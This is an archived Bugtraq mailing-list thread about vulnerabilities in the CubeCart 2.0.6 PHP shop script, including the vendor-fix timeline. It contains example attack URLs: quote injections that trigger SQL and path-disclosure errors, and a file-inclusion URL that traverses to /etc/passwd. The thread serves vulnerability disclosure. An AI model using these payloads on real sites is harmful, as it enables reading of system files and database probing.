Hi Ravish, This only happens on older versions, it was fixed in 2.0.5. (see [NOBYTES.COM: #2] CubeCart 2.0.4 - Multiple Vulnerabilities) The only other thing an attacker could do is to include a .php file somewhere else on the server. For example, if the attacker also had his/her website on that same server and knew the full path to it, they could use file inclusion to launch an 'evil' .php file from there home folder. Regards John www.NoBytes.com Web Design, Web Hosting, Hardware, Software, You Name it, if its to do with IT we can sort it. -----Original Message----- From: Ravish Ahuja [mailto:ravish@xxxxxxxxxxx] Sent: 06 April 2005 20:44 To: 'John Cobb'; bugtraq@xxxxxxxxxxxxxxxxx Subject: RE: [NOBYTES.COM: #6] CubeCart 2.0.6 - Information Disclosure Hello, http://www.victimsite.com/index.php?&language=f00bar.php Warning: Failed opening '/var/www/html/admin/lang/f00bar.php' for inclusion (include_path='.:/usr/share/pear') in /var/www/html/admin/settings.inc.php on line 147 This is path disclosure but it can also be used for malicious file include. http://www.victimsite.com/index.php?language=../../../../../etc/passwd Regards, Ravish http://www.xeonext.com -----Original Message----- From: John Cobb [mailto:johnc@xxxxxxxxxxx] Sent: Sunday, February 06, 2005 11:09 PM To: bugtraq@xxxxxxxxxxxxxxxxx Subject: [NOBYTES.COM: #6] CubeCart 2.0.6 - Information Disclosure Hello All, I have discovered a number of remote vulnerabilities in: CubeCart 2.0.6. Authors Site: http://www.cubecart.com CubeCart is described by its authors as: 'What is CubeCart? CubeCart is an eCommerce script written with PHP & MySQL. With CubeCart you can setup a powerful online store as long as you have hosting supporting PHP and one MySQL database.' +-[Examples:]--------------------------------------------------+ [1]------------------------------------------------------------+ http://www.victimsite.com/index.php?&language=f00bar.php Warning: Failed opening '/var/www/html/admin/lang/f00bar.php' for inclusion (include_path='.:/usr/share/pear') in /var/www/html/admin/settings.inc.php on line 147 [2]------------------------------------------------------------+ http://www.victimsite.com/index.php?&PHPSESSID=' Warning: Failed to write session data (files). Please verify that the current setting of session.save_path is correct (/tmp) in Unknown on line 0 [3]------------------------------------------------------------+ http://www.victimsite.com/tellafriend.php?&product=' Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /var/www/html/tellafriend.php on line 46 [4]------------------------------------------------------------+ http://www.victimsite.com/view_cart.php?add=' Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /var/www/html/view_cart.php on line 49 [5]------------------------------------------------------------+ http://www.victimsite.com/view_product.php?product=' Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in /var/www/html/view_product.php on line 53 Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /var/www/html/view_product.php on line 63 Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in /var/www/html/view_product.php on line 144 +-[Notes:]-----------------------------------------------------+ Vulnerabilities found on: 05/03/2005 Author(s) Informed on: 05/03/2005 Author(s) Response: 05/03/2005 Author(s) Fix: 05/04/2005 Regards John Cobb JohnC@xxxxxxxxxxx http://www.NoBytes.com
